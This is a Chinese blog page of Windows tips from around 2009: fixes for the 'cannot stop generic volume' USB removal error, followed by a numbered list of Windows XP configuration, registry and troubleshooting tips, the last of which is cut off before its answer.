大家是不是经常遇见“现在无法停止‘通用卷’设备”。请稍候再停止该设备。"的问题?经常插上u盘,mp3,移动硬盘等设备,想要安全删除它时经常会出现图上的无用提示!有些情况关掉相应窗口,刷新几次就可以安全删除!不过大多数情况是我们不得不强行拔出!
第一种方法:
一个国外的十分小巧实用的软件,只有191KB,叫unlocker,十分好用! 这个软件能解锁USB连接设备!就能实现100%安全删除USB连接了!
第二种方法:
我们只需要把系统的预览功能关掉,这种问题就不会再出现了,操作办法是:双击我的电脑-工具-文件夹选项-常规-任务-使用windows传统风格的文件夹,然后点击应用-确定就行了.这样就ok了!
第三种方法:
先关闭存在于移动设备上的打开文件。进其他硬盘分区做简单操作例如“复制”“粘贴”等,然后就可停止了。把“rundll32.exe”进程结束,也可以正常删除。方法:同时按下键盘的“Ctrl”+“Alt”+“Del”组合键,这时会出现“任务管理器”的窗口,单击“进程”标签,在"映像名称”中寻找“rundll32.exe”进程(如果有多个“rundll32.exe”进程,全部关闭即可。),选择“rundll32.exe”进程,然后点击“结束进程”,这时会弹出“任务管理器警告”,这时为了让用户确定是否关闭此进程,点击“是”即关闭了“rundll32.exe”进程。
还有最后一个办法,关闭计算机,待闪存盘的指示灯灭了以后,即可安全拔出;如果没有指示灯的闪存盘话,那么待计算机电源指示灯关闭熄灭后,即可安全拔出。
但以上方法都是发生了"现在无法停止通用卷设备,请稍候再停止设备"问题后,那么有没有方法预防这个问题呢?
先将闪存插到USB接口,然后在Windows XP中用鼠标右键单击“我的电脑”图标,依次展开“属性→硬件→设备管理器→磁盘驱动器”,找到“USB Flash Drive USB Device”(不同品牌的闪存名称可能不同),然后双击它打开 “USB Flash Drive USB Device属性”对话框。切换到“策略”选项卡,选中“为快速删除而优化”,单击“确定”退出。以后不用理会系统托盘中的“安全删除硬件”图标,只要没有对闪存进行数据读写操作(即闪存的指示灯不闪动),就可以直接将闪存从USB接口拔下来了。 www.592long.cn
第四种方法:
卸载整个USB驱动,重新安装
第五个方法:
在“开始”-"运行"打入这段代码:REGSVR32 /U SHMEDIA.DLL。
...
小龙博客
小龙与您一起关注互联网动态,并及时和大家分享讨论网站运营的最新技术资讯!
24 2009-12
分类:技术文章 | 评论:0 | 浏览:
声明:以下技巧都是一些常用技巧,但也并不是每个人都很清楚,请只选择你感兴趣的内容选择性的观看。
1、如何实现关机时清空页面文件打开“控制面板”,单击“管理工具→本地安全策略→本地策略→安全选项”,双击其中“关机:清理虚拟内存页面文件”一项,单击弹出菜单中的“已启用”选项,单击“确定”即可。
2、如何自行配置Windows XP的服务
如果你是在单机使用Windows XP,那么很多服务组件是根本不需要的,额外的服务程序影响了系统的速度,完全可将这些多余的服务组件禁用。单击“开始→控制面板→管理工具→服务”,弹出服务列表窗口,有些服务已经启动,有些则没有。我们可查看相应的服务项目描述,对不需要的服务予以关闭。如“Alerter”,如果你未连上局域网且不需要管理警报,则可将其关闭。
3、Smartdrv程序有什么作用
现象:在许多有关Windows XP安装的介绍文章中都提到:“如果在DOS下安装Windows XP非常慢,肯定是安装前未运行Smartdrv.exe。我想问这个Smartdrv.exe文件有什么饔?具体如何使用?
Smartdrv.exe这个文件对于熟悉DOS的朋友肯定很清楚,主要作用是为磁盘文件读写增加高速缓存。大家知道内存的读写速度比磁盘高得多,如果将内存作为磁盘读写的高速缓存可以有效提高系统运行效率。Smartdrv.exe这个文件在Windows各个版本的安装光盘中或是硬盘上的 Windows/command/里都有,只有几十KB,把这个文件复制到软盘下,启动系统后直接运行这个程序(可以不加参数,该程序会自动根据内存大小分配适当的内存空间作为高速缓存),再安装Windows XP即可。另外提醒大家,这个程序在安装完Windows后,不要运行,否则Windows可用内存将减少。
4、Win32k.sys是什么文件
现象:我刚装了Windows XP,可是接下去再装毒霸就发现病毒,位于F:\WINNT\ SYSTEM32里的Win32k.sys文件,删又不可删,隔离又不行,在Windows 98下或DOS下删就会导致Windows XP不可启动,请问该文件是干什么用的,有什么方法解决?
这个文件是Windows XP多用户管理的驱动文件。在X:\Windows\System32\Dllcache目录下有此文件的备份。只要将此备份拷到X:\Windows\ System32下替代带病毒的文件即可。做一张Windows 98启动盘,并将Attrib.exe文件拷入软盘,此文件在装有Windows 98的机器上的X:\Windows\Command目录下。在BIOS的Advanced BIOS Features 中将启动顺序调整为从A盘启动,进入DOS后,进入X:\Windows\System32目录,输入Attrib -s -h -r win32k.sys,再进入X:\Windows\System32\dllcache目录下输入同样命令,再用copy win32k.sys X:\windows\System32覆盖原文件,再重新启动即可。
5、Windows XP的开机菜单有什么含义
现象:最近我安装了Windows XP操作系统,我知道在启动时按F8键或当计算机不能正常启动时,就会进入Windows XP启动的高级选项菜单,在这里可以选择除正常启动外的8种不同的模式启动Windows XP。请问这些模式分别代表什么意思?
(1)安全模式:选用安全模式启动Windows XP时,系统只使用一些最基本的文件和驱动程序启动。进入安全模式是诊断故障的一个重要步骤。如果安全模式启动后无法确定问题,或者根本无法启动安全模式,那你就可能需要使用紧急修复磁盘ERD的功能修复系统了。
(2)网络安全模式:和安全模式类似,但是增加了对网络连接的支持。在局域网环境中解决Windows XP的启动故障,此选项很有用。
(3)命令提示符的安全模式:也和安全模式类似,只使用基本的文件和驱动程序启动Windows XP。但登录后屏幕出现命令提示符,而不是Windows桌面。
(4)启用启动日志:启动Windows XP,同时将由系统加载的所有驱动程序和服务记录到文件中。文件名为ntbtlog.txt,位于Windir目录中。该日志对确定系统启动问题的准确原因很有用。
(5)启用VGA模式:使用基本VGA驱动程序启动Windows XP。当安装了使Windows XP不能正常启动的新显卡驱动程序,或由于刷新频率设置不当造成故障时,这种模式十分有用。当在安全模式下启动Windows XP时,只使用最基本的显卡驱动程序。
(6)最近一次的正确配置:选择“使用‘最后一次正确的配置’启动Windows XP”是解决诸如新添加的驱动程序与硬件不相符之类问题的一种方法。用这种方式启动,Windows XP只恢复注册表项HklmSystemCurrentControlSet下的信息。任何在其他注册表项中所做的更改均保持不变。
(7)目录服务恢复模式:不适用于Windows XP Professional。这是针对Windows XP Server操作系统的,并只用于还原域控制器上的Sysvol目录和Active Directory目录服务。
(8)调试模式:启动Windows XP,同时将调试信息通过串行电缆发送到其他计算机。如果正在或已经使用远程安装服务在你的计算机上安装Windows XP,可以看到与使用远程安装服务恢复系统相关的附加选项。
6、如何彻底删除XP
现象:我装了Windows Me和Windows XP双系统,都是FAT32格式。C盘装Windows Me,E盘装Windows XP。昨天,Windows XP系统丢失了SYSTEM32.DLL,启动不了。于是我在进入Windows Me系统内,在E盘直接删除Windows XP。但是,每次开机都出现多系统启动菜单,供选择。我该怎样才可以彻底删除XP?
用一张Windows 9x/Me的启动盘启动,在“A:”下输入“SYS C:”,给C盘重新传系统即可。
7、如何处理Windows XP不能自动关机现象
现象:我的Windows XP有时候不能自动关闭电脑,请问应该怎么办?
安装完Windows XP之后,有些计算机在单击关闭电脑之后并不能自动关闭,而需像以前的AT电源一样手动关闭。这主要是Windows XP未启用高级电源管理。修正方法:单击“开始→控制面板→性能和维护→电源选项”,在弹出的电源选项属性设置窗口中,单击“高级电源管理”并勾选“启用高级电源管理支持”。
8、如何创建“锁定计算机”的快捷方式
因有急事而需要离开,但又不希望电脑进行系统注销,该怎么办?你完全可以通过双击桌面快捷方式来迅速锁定键盘和显示器,且无需使用“Ctrl+Alt +Del”组合键或屏幕保护程序。操作方法:在桌面上单击鼠标右键,在随后出现的快捷菜单上指向“新建”,并选择“快捷方式”。接着,系统便会启动创建快捷方式向导。请在文本框中输入下列信息:rundll32.exe user32.dll, LockWorkStation,单击“下一步”。输入快捷方式名称。你可将其命名为“锁定工作站”或选用你所喜欢的任何名称,单击“完成”。你还可对快捷方式图标进行修改(我最喜欢的一个是由Shell32.dll所提供的挂锁图标)。如需修改快捷方式图标,请执行下列操作步骤:右键单击“快捷方式”,并在随后出现的快捷菜单上选择“属性”。选择“快捷方式”选项卡,接着,单击“更改图标”按钮。在以下文件中查找图标文本框中,输入 Shell32.dll,单击“确定”。从列表中选择所需图标,并单击“确定”。你还可为快捷方式指定一组快捷键,比如“Ctrl+Alt+L”。这种做法虽然只能帮助你节省一次击键,但却可使操作变得更加灵便。如需添加快捷键组合,请执行下列操作步骤:右键单击“快捷方式”,并在随后出现的快捷菜单上选择“属性”。选择“快捷方式”选项卡,在快捷键文本框中,输入任何键值,而Windows XP则会将其转换成快捷键组合(一般应采取Ctrl+Alt+任意键的形式)。如欲锁定键盘和显示器,只需双击相关快捷方式或使用所定义的快捷键即可。
9、如何调整桌面图标颜色质量
在桌面空白处单击鼠标右键,在打开的“显示 属性”对话框中选择“设置”选项卡,通过“颜色质量”下拉列表你可以调整计算机的颜色质量。你也可以通过编辑注册表来调整桌面图标的颜色质量,具体操作步骤:
打开注册表编辑器,进入HKEY_CURRENT_ USER\Control Panel\Desktop\WindowMetrics子键分支,双击Shell Icon BPP键值项,在打开的“编辑字符串”对话框中,“数值数据”文本框内显示了桌面图标的颜色参数,系统默认的图标颜色参数为16。这里提供的可用颜色参数包括 :4表示16种颜色,8表示256种颜色,16表示65536种颜色,24表示1600万种颜色,32表示True Color(真彩色)。你可以根据自己的不需要选择和设置你的桌面图标颜色参数。单击“确定”关闭“编辑字符串”对话框。注销当前用户并重新启动计算机后设置就生效。
在桌面空白处单击鼠标右键,在打开的“显示属性”对话框中选择“外观”选项卡,在这里你可以方便地对整个桌面、窗口或者其他项目的字体和图标大小进行调整。
不过,用这种方式设置图标大小有一定局限性,比如,用户只能选择系统已经提供的桌面大小方案,不能自己任意设置桌面图标的大小。如果你想随心所欲地对桌面图标大小进行调整,可以通过编辑注册表来达到目的。具体操作步骤是: 打开注册表编辑器,进入HKEY_CURRENT_ USER\Control Panel\Desktop\WindowMetrics子键分支,双击Shell Icon Size键值项,在打开的“编辑字符串”对话框中,“数值数据”文本框内显示了桌面图标的大小参数,系统默认29,用户可以根据自己的需要设置参数大小 (参数越大,桌面图标也越大),然后单击“确定”关闭“编辑字符串”对话框。当你注销当前用户并重新启动计算机后设置就生效。
10、如何对系统声音进行选择与设置
系统声音的选择与设置就是为系统中的事件设置声音,当事件被激活时系统会根据用户的设置自动发出声音提示用户。 选择系统声音的操作步骤如下:
(1)在“控制面板”窗口中双击“声音及音频设备”图标,打开“声音及音频设备”属性对话框,它提供了检查配置系统声音环境的手段。这个对话框包含了音量、声音、音频、语声和硬件共5个选项卡。
(2)在“声音”选项卡中,“程序事件”列表框中显示了当前Windows XP中的所有声音事件。如果在声音事件的前面有一个“小喇叭”的标志,表示该声音事件有一个声音提示。要设置声音事件的声音提示,则在“程序事件”列表框中选择声音事件,然后从“声音”下拉列表中选择需要的声音文件作为声音提示。
(3)用户如果对系统提供的声音文件不满意,可以单击“浏览”按钮,弹出浏览声音对话框。在该对话框中选定声音文件,并单击“确定”按钮,回到“声音”选项卡。
(4)在Windows XP中,系统预置了多种声音方案供用户选择。用户可以从“声音方案”下拉表中选择一个方案,以便给声音事件选择声音。
(5)如果用户要自己设置配音方案,可以在“程序事件”列表框中选择需要的声音文件并配置声音,单击“声音方案”选项组中的“另存为”按钮,打开“将方案存为”对话框。在“将此配音方案存为”文本框中输入声音文件的名称后,单击“确定”按钮即可。如果用户对自己设置的配音方案不满意,可以在“声音方案”选项组中,选定该方案,然后单击“删除”按钮,删除该方案。
(6)选择“音量”选项卡,打开“音量”选项卡。你可以在“设备音量”选项组中,通过左右调整滑块改变系统输出的音量大小。如果希望在任务栏中显示音量控制图标,可以启用“将音量图标放入任务栏”复选框。
(7)你想调节各项音频输入输出的音量,单击“设备音量”区域中的“高级”按钮,在弹出的“音量控制”对话框里调节即可。这里列出了从总体音量到CD唱机、PC扬声器等单项输入输出的音量控制功能。你也可以通过选择“静音”来关闭相应的单项音量。
(8)单击“音量”选项卡中的“扬声器设置”区域中的“高级”按钮后,在弹出的“高级音频属性”对话框你可以为自己的多媒体系统设定最接近你的硬件配置的扬声器模式。
(9)在“高级音频属性”对话框中选择“性能”选项卡,这里提供了对音频播放及其硬件加速和采样率转换质量的调节功能。要说明的是,并不是所有的选项都是越高越好,你需要根据自己的硬件情况进行设定,较好的质量通常意味着较高的资源占有率。
设置完毕后,单击“确定”按钮保存设置。
11、如何分配临时管理权限
许多程序在安装过程中都要求你具备管理权限。这里介绍了一种以普通用户身份登录的情况下,临时为自己分配管理权限的简单方法。在右键单击程序安装文件的同时按住“Shift”键。在随后出现的快捷菜单中单击“运行方式”,输入具有相应管理权限的用户名和密码。这种方式对于开始菜单上的应用程序同样适用。
12、如何关闭Windows XP的自动播放功能
一旦你将多媒体光盘插入驱动器,自动运行就会从驱动器中读取数据,这会造成程序的设置文件和在音频媒体上的音乐立即开始。你可以用下面这个办法关闭这个功能:打开“开始→运行”,在对话框中输入“gpedit.msc”命令,在出现“组策略”窗口中依次选择“在计算机配置→管理模板→系统”,双击“关闭自动播放”,在“设置”选项卡中选“已启用”选项,最后单击“确定”按钮即可(图1-32)。
13、如何恢复被破坏的系统引导文件
现象:我只安装了Windows XP系统,但在开机时显示“BOOT.INI非法,正从C:\WINDOWS\启动”,然后就进入了启动状态,并且也能照样工作,请问这是怎么一回事,能否在不重装系统的情况下使系统恢复到正常启动状态?
出现这种情况是因为C盘下面的“Boot.ini”文件被破坏了。但是由于你的机器中只有一个操作系统,当然它就是默认的操作系统,即使“Boot.ini”文件被破坏了,也将自动地引导该系统进行装载。
解决的办法是建立一个“Boot.ini”文件即可。其内容为:
[Boot Loader]
Default=C:
[Operating Systems]
C:\=“Microsoft Windows xp”
14、如何恢复输入法图标
现象:本人使用Windows XP中文版,不慎使任务栏隐藏了输入法图标,请问该如何恢复输入法图标。
打开“控制面板”,双击“区域和语言选项”图标,进入“区域和语言选项”对话框,选择“语言”选项卡,单击“详细信息”按钮,在弹出的对话框中单击 “语言栏”按钮,在接着出现的“语言栏设置”对话框中勾选“在桌面上显示语言栏”选项。这时候桌面会出现语言栏,单击右上角的最小化按钮,输入法图标就回到任务栏中去了。
15、如何恢复误删除的boot.ini文件
现象:我第一次装Windows XP时,重启后没有任何问题。但是由于误操作,删掉了C盘目录下的一个文件(文件名是:boot.ini),然后再重启时每次都显示两行字: “boot.ini是非法的。现在正从C:/Windows/下启动”。然后可以顺利进入Windows XP。但是速度明显慢了,比没删这个文件时慢了很多,而且,每次都要看见那两行字。请问如何修复?
boot.ini是系统启动时,需要查询的一个系统文件,它告诉启动程序本计算机有几个操作系统、各系统的位置在哪里等信息。重新恢复的方法如下:单击“开始”菜单,依次指向“程序→附件→记事本”,打开“记事本”,在记事本里输入:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1) \Windows
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\Windows=“Microsoft Windows XP Professional” /fastdetect
然后将它保存为名字是boot.ini的文件,并将此文件保存到C盘的根目录下即可。
16、如何加快Windows XP窗口显示速度
我们可以通过修改注册表来改变窗口从任务栏弹出,以及最小化回归任务栏的动作,步骤如下:打开注册表编辑器,找到HKEY_ CURRENT_USER\Control Panel\Desktop\ WindowMetrics子键分支,在右边的窗口中找到MinAnimate键值,其类型为REG_SZ,默认情况下此健值的值为1,表示打开窗口显示的动画,把它改为0,则禁止动画的显示,接下来从开始菜单中选择“注销”命令,激活刚才所作的修改即可。
17、如何解决Windows XP关机出现英文提示
现象:我的Windows XP关机时会出现一个进度条,并提示“To return to windows and check the status of the program click cancel if you choose to end the program immediately you will lose any unsaved data. To end the program now click end.”然后就正常关机,但有时却不出现,我想会不会与我的东方影都3的记忆播放有关,但关闭记忆播放功能也无效,请问如何办?
这是因为你关闭Windows XP时还有程序在运行,请在关机之前保存并关闭一切应用程序。如果直接单击“End”按钮,那么未保存的任务会丢失,这时可以按“Ctrl+Alt+ Del”打开任务管理器,然后关闭应用程序。如果在任务管理器列表中为空,那么就在“系统进程”中将它关闭。如果不进行任何操作,那么系统将在进度条到头时自动关闭未关闭的程序并关闭系统。请你在关机之前关闭一切应用程序、系统驻留程序就不会出现这个提示了。当你确定没有任何需要保存的任务时,可以不必理会此对话框。
18、如何控制桌面的图标显示
通常很多用户还是习惯于在桌面上保留“我的文档”及其他经常访问文件夹快捷方式以及经常使用的程序快捷方式。如果你想在桌面上显示“我的电脑”、“我的文档”、“网上邻居”、IE浏览器的快捷方式图标,只需进行如下操作 :在桌面单击鼠标右键,在右键菜单中选择“属性”命令,在打开的“显示属性”对话框中选择“桌面”选项卡,单击“自定义桌面”按钮,打开“桌面”项目对话框。在“常规”选项卡的“桌面图标”栏中选择所需项目的复选框,然后单击“确定”返回上一级对话框,再单击“应用”按钮即可。
19、如何删除Windows XP的“更新”选项
对于大多数的用户来说,Windows XP的Windows Update功能似乎作用不大,我们可以去掉它,操作步骤如下:打开注册表编辑器,找到HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies\Explorer子键分支,选择“编辑”菜单下的“新建”命令,新建一个类型为REG_DWord的值,名称为NoCommonGroups,双击新建的NoCommon Groups子键,在“编辑字符串”文本框中输入键值“1”,然后单击“确定”按钮并重新启动系统即可。
20、如何设置音频属性
打开“控制面板”,双击“声音及音频设备”图标,在“声音及音频设备属性”对话框中,选择“音频”选项卡,在该选项卡中,你可以看到与“声音播放”、“录音”和“MIDI音乐播放”有关的默认设备。当你的计算机上安装有多个音频设备时,就可以在这里选择应用的默认设备,并且还可以调节其音量及进行高级设置。
进行音频设置的操作步骤如下:
(1)在“声音播放”选项组中,从“默认设备”下拉列表中选择声音播放的首选设备,一般使用系统默认设备。
(2)用户如果希望调整声音播放的音量,可以单击“音量控制”窗口,在该窗口中,将音量控制滑块上下拖动即可调整音量大小。
(3)在该窗口中,用户可以为不同的设备设置音量。例如,当用户在播放CD时,调节“CD音频”选项组中的音量控制滑块,可以改变播放CD的音量;当用户播放MP3和WAV等文件时,用户还可以在“音量控制”窗口进行左右声道的平衡、静音等设置。
(4)用户如果想选择扬声器或设置系统的播放性能,可以单击“声音播放”选项组中的“高级”按钮,打开 “高级音频属性”对话框,在“扬声器”和“性能”选项卡可以分别为自己的多媒体系统设定最接近你的硬件配置的扬声器模式及调节音频播放的硬件加速功能和采样率转换质量。
(5)在“录音”选项组中,可以从“默认设备”下拉列表中选择录音默认设备。单击“音量”按钮,打开 “录音控制”对话窗口。用户可以在该窗口中改变录音左右声道的平衡状态以及录音的音量大小。
(6)在“MIDI音乐播放”选项组中,从“默认设备”下拉列表中选择 MIDI音乐播放默认设备。单击“音量”按钮,打开“音量控制”窗口调整音量大小。
(7)如果用户使用默认设备工作,可启用“仅使用默认设备”复选框。设置完毕后,单击“应用”按钮保存设置。
21、如何设置语声效果
用户在进行语声的输入和输出之前,应对语声属性进行设置。在“声音和音频设备 属性”对话框中,选择“语声”选项卡,在该选项卡中,用户不但可以为“声音播放”和“录音”选择默认设备,而且还可调节音量大小及进行语声测试。
(1)在“声音播放”选项组中,从“默认设备”下拉列表中选择声音播放的设备,单击“音量”按钮,打开“音量控制”窗口调整声音播放的音量。要设置声音播放的高级音频属性,单击“高级”按钮完成设置。
(2)在“录音”选项组中,从“默认设备”下拉列表中选择语声捕获的默认设备,单击“音量”按钮,打开“录音控制”窗口调整语声捕获的音量。要设置语声捕获的高级属性,单击“高级”按钮完成设置。
(3)单击“测试硬件”按钮,打开 “声音硬件测试向导”对话框,该向导测试选定的声音硬件是否可以同时播放声音和注册语声。注释:要确保测试的准确性,在测试之前必须关闭使用麦克风的所有程序,如语声听写或语声通信程序。
(4)单击“下一步”按钮,向导开始测试声音硬件,并通过对话框显示检测进度。
(5)检测完毕后,打开“正在完成声音硬件测试向导”对话框,通告用户检测结果,单击“完成”按钮关闭对话框。
(6)设置完毕后,单击“确定”按钮保存设置。
22、如何手动使计算机进入休眠状态
现象:请问如何用手动方式使Windows XP的计算机进入休眠状态?
休眠功能是Windows XP提供的一项非常酷的特性,它“隐藏”在Shut Down(关机)对话框中。如果你的计算机支持休眠功能,那么借助以下技巧,可通过手动方式使其进入休眠状态。如需以手动方式使你的计算机进入休眠状态,请执行以下操作步骤:选择“开始→关闭计算机”,在关闭Windows对话框中,选择“休眠”。当你的计算机进入休眠状态后,内存中的内容将保存到硬盘上。当你将计算机唤醒时,进入休眠状态前打开的所有程序与文档都将恢复到桌面上。如需在你的计算机上激活休眠支持特性,请执行以下操作步骤:你必须以管理员、 Administrators或Power Users组成员的身份登录。如果你的计算机与某个网络建立了连接,那么网络策略设置可能会导致这一操作过程无法实现。单击“开始→控制面板→性能和维护 →电源选项”,选择“休眠”选项卡,选中“启用休眠”,单击“确定”关闭电源选项对话框。如果休眠选项卡不可用,则说明你的硬件设备无法支持该特性。
23、如何提高Windows XP的启动速度
使用微软提供的“Bootvis”软件可以有效地提高Windows XP的启动速度。这个工具是微软内部提供的,专门用于提升Windows XP启动速度。下载解压缩到一个文件夹下,并在“Options”选项中设置使用当前路径。之后从“Trace”选项下拉菜单中选择跟踪方式。该程序会引导Windows XP重新启动,并记录启动进程,生成相关的BIN文件。之后从Bootvis中调用这个文件,从Trace项下拉菜单中选择“Op- timizesystem”命令即可。
Windows XP虽然提供了一个非常好的界面外观,但这样的设置也在极大程度上影响了系统的运行速度。如果你的电脑运行起来速度不是很快,建议将所有的附加桌面设置取消,也就是将Windows XP的桌面恢复到Windows 2000样式。
设置的方法非常简单:在“我的电脑”上单击鼠标右键,选择“属性”,在“高级”选项卡中单击“性能”项中的“设置”按钮,在关联界面中选择“调整为最佳性能”复选框即可。
此外,一个对Windows XP影响重大的硬件就是内存。使用256MB内存运行Windows XP会比较流畅,512MB的内存可以让系统运行得很好。如果条件允许,最好增大内存。
24、如何为Windows XP减肥
Windows XP比以往的任何Windows系统都要庞大,其硬盘空间需求1.5GB。虽然相对于能跑Windows XP的主流电脑来说,一般都拥有10GB以上的硬盘,但一些电脑发烧友有时还是乐于减少Windows XP的体积。
(1)删除驱动备份 :Windows\Driver cache\i386目录下的Driver.cab文件(73MB) 。
(2)删除Help文档(减掉40多MB) 。
(3)删除Windows\Ime下不用的输入法(日文、韩文、约80MB) 。
(4)把我的文件、IE的临时文件夹转到其他硬盘(分区) 。
(5)把虚拟内存转到其他硬盘(分区)。
25、如何卸载Windows XP
现象:我原来使用的操作系统是Windows 98,最近听说Windows XP非常好,就安装了该系统。第一次安装是从Windows 98中安装,装完后觉得不太好,就格式化Windows XP的分区后重新从DOS安装到D盘,安装完后发现多重启动菜单有三项(第一次装的Windows XP那一项还在),请问如何删除多余的一项?另外,如果我要删除Windows XP,除了格式化D盘外,怎样才能将它彻底删除?
Windows 98和Windows XP双系统的启动菜单是由C盘根目录下的一个文件来控制的,通过修改该文件可以更改启动菜单。要想删除多余的Windows XP项目,你可以打开C盘根目录下的boot.ini文件,其中有两行重复的“multi(0)…”,删除其中一行即可。要想彻底删除Windows XP,除了格式化它所在分区之外,你还必须按下面的方法删除多重启动菜单和多余的系统文件:
(1)制作一张Windows 98启动盘,并将Windows 98下的sys.com文件拷入该系统盘。
(2)用该启动盘启动,在A:>下执行sys C:命令。
(3)删除C盘根目录下多余的文件,这些文件包括:boot.ini、bootfont.bin、bootsect.dos、ntdetect.com、pagefile.sys等。
26、如何隐藏桌面图标
在Windows XP中增加了隐藏桌面图标的功能,你只需用鼠标单击桌面空白处,在弹出的右键菜单中选定“排列图标”命令,然后在其下一级级联菜单中取消对“显示桌面图标”命令的选定,系统就会自动将所有桌面图标隐藏。
如果桌面上图标数量较多,可以用以下方法重新排列图标 :在桌面空白区域单击鼠标右键,在弹出菜单中选择“排列图标”,然后在下一级菜单中单击图标排列规则即可。
利用Windows XP的“桌面清理”功能,可将你桌面上不使用的图标清理掉。方法是:在上面的“桌面”项目对话框的“常规”选项卡中,如果你选中“每60天运行桌面清理向导”复选框,系统就会每60天自动运行一次桌面清理向导,帮你清理掉桌面上不使用的图标。如果你单击“现在清理桌面”按钮,则系统会立即打开桌面清理向导,将你不使用的快捷方式图标移到一个名为“未使用的桌面快捷方式”的桌面文件夹中。该向导不移动、更改和删除任何程序,如果你想将某个图标重新移回桌面,可以从“未使用的桌面快捷方式”的桌面文件夹中将其还原。
27、如何在Windows XP中进行繁体字输入
使用微软拼音3.0可以进行繁体字输入,你可在系统中选择微软拼音输入法,单击“选项”并在其中选中简、繁转换项,这时输入法状态条中就会有简、繁转换按钮,需要使用它切换即可进行繁体字输入了。
当然还有其它更多的方法,就不再一一详述了。
28、如何找回两台电脑相连图标
现象:我的电脑装的是Windows XP,在上网时系统托盘内的两台电脑相连的小图标不见了,使我经常不知道是否在线。请问应如何将它恢复?
小图标不见了的原因在于网络连接的属性设置不对。在Windows 98中拨号连接上互联网后,该连接的小图标将自动显示在任务栏上。如果小图标不见了,可右击“我的连接”,选择“属性→设置→选项”,选中“显示调制解调器状态”即可恢复。在Windows 2000和Windows XP中,用户可以控制和设置连接图标的显示和隐藏功能。具体的方法是打开拨号连接或者网络连接的“属性”对话框,然后选中或者清除“连接后在通知区域显示图标”复选框,就可以实现该图标的显示或隐藏了。
29、如何制作自动系统恢复软盘
现象:我在Windows XP下未找到制作紧急修复磁盘的界面,请问如何制作?另外我的Windows 98每次启动时都提示输入用户名与密码,请问如何消除?
Windows XP的紧急修复磁盘准确的名称应该是“自动系统恢复(ASR) 软盘”,它可以备份那些启动系统所需的系统文件。制作方法是:单击“开始→所有程序→附件→系统工具”,然后单击“备份”,单击备份工具向导中的“高级模式”按钮。在“工具”菜单上,单击“ASR 向导”;然后按照屏幕上的提示进行操作即可(注意:事先应准备好保存系统设置的1.44MB的空软盘)。使用方法也很简单:将Windows XP系统的安装光盘插入CD驱动器中,重新启动计算机。在出现安装界面时,按F2,系统将提示你插入以前创建的ASR软盘(ASR不会还原数据文件)。请按照屏幕上的向导进行操作即可自动恢复系统。另外,即使没有 “自动系统恢复(ASR) 软盘”,也可以使用“修复”功能恢复Windows XP系统引导菜单,只是某些个人的特殊设置会被恢复成默认设置,使用“自动系统恢复(ASR) 软盘”则不会。
Windows 98每次启动时都提示输入用户名与密码,可以按“Esc”键进入Windows 98桌面,这时可以将Windows目录下的密码文件*.pwl删除。例如用户名为“qq”,相应的密码文件就是“qq.pwl”,找到它并删除它,然后重新启动电脑,在出现登录窗口时输入原来的用户名“qq”,密码不填,这样就可以消除了。
30、如何自动关闭停止响应的程序
在Windows XP操作系统中,这个设置可以使Windows XP当诊测到某个应用程序已经停止响应时可以自动关闭它,而不需要进行麻烦的手工干预。想要实现这个功能,就请单击“开始→运行”输入“Regedit” 打开注册表编辑器,找到HKEY_CURRENT_USER\Control Panel\Desktop分支,将Auto End Tasks的键值设置为1即可。
31、为何不能安装Windows XP
现象:我用Windows 98启动盘启动计算机并安装Windows XP,整整花了6个小时才完成,听朋友说他在一台配置和我一样的机器上只花了1个小时的时间就完成了Windows XP的安装(也是用Windows 98启动盘启动),请问Windows XP正确的安装方法是怎样的?
这是因为你没有加载磁盘高速缓存的缘故。此文件在Windows 98的安装目录下,名为smartdrv.exe,将其拷入软盘,安装之前运行一下就可以了。另外你可以将启动顺序设为从光盘启动,这样Windows XP的安装盘会自动加载磁盘高速缓存。
32、为何不能在Windows XP下安装软件
现象:我在一台安装有Windows XP 家庭版的微机上安装软件时出现“You do not have access to make the requried system configuration modifications. Please return this installation from an administrators account.”。请问这是为什么?这种软件在Windows 98下可正常安装。请问如何解决?
Windows XP为了保护系统的安全和稳定,使用了用户账户和密码保护的方式来控制用户的操作。即只有指定的人才能干指定的事情。安装软件等修改系统的操作需要用户拥有该计算机管理员的权力才能执行,这就是你为什么不能安装软件的原因,相信还有很多操作你都执行不了。
系统在安装时,默认“administrator”帐号是管理员的身份,你可以采用下面的方法使自己成为管理员:
(1)首先要以管理员的身份进入计算机。单击“开始”菜单上的“注销”,确认进入等待登录的画面,同时按下键盘上的“Ctrl+Alt+Del”键。
(2)在弹出的对话框中,在用户名框中输入“administrator”,密码框中输入安装时设置的密码。如果你在安装时没有设置密码,密码当然为空,然后回车进入计算机。
(3)打开“控制面板中”的“用户账户”,就会看到自己的用户账户,在旁边写着“受限的账户”。
(4)单击打开自己的账户,然后单击“更改账户类型”。在弹出的窗口中,单击选中“计算机管理员”的单选按钮,然后单击“更改账户类型”按钮,确认并退出。你现在就可以干自己想做的事情了。
为了保证计算机的安全,建议用户设置用户密码,以避免发生安全问题而遭到不必要的损失。
33、为何更改硬件配置就出现死机现象
现象:在Windows XP中只要一更改硬件配置,系统就启动不了,如何解决?
这是因为Windows XP中使用了激活产品程序,激活产品程序是微软在Windows XP中最新加入的防盗版功能。由于激活产品程序会根据你的电脑硬件配置生成一个硬件号,因此如果你改变了改硬件配置,激活产品程序就会发现硬件配置与之不符,这时系统就会停止运行并要求你重新激活产品才可以重新运行。
34、为什么Windows XP磁盘可用空间不断减少
现象:我使用Windows XP时发现,随着不断地增加、删除应用程序,磁盘可用空间不断减少,这是为什么?
从Windows 2000开始,Windows会在每个硬盘分区中建立一个“System Volume Infor-mation”文件夹,在该文件夹中提供的是系统默认保存的系统还原备份文件。不过Windows 2000还没有正式提供系统还原功能,在Windows XP中,你可以看到相关的选项。
为防止这个问题发生,最简单的方法就是关闭“系统还原”功能。如果要删除这个文件夹中保存的文件,你需要以Administrator(管理员)身份登录系统。
35、为什么Windows XP所占空间很大
现象:安装了Windows XP后,使用一段时间发现经常登陆的一个用户的文件夹所占的空间特别大,大约1.2GB;可是其他不常登陆的只有10MB左右,这是怎么回事?
Windows XP为每个用户都设置了各自的文件夹,把登录用户在使用过程中的操作都记录下来,同时也产生各自的临时文件,上网缓存文件,安装软件时产生的共用文件(软件中共用),所以常登录的用户文件夹必然很大。把临时文件与上网的缓存文件删除可以省出很多空间。
36、如何消除Windows XP的文档保护功能
怎样消除Windows XP的文档保护功能?
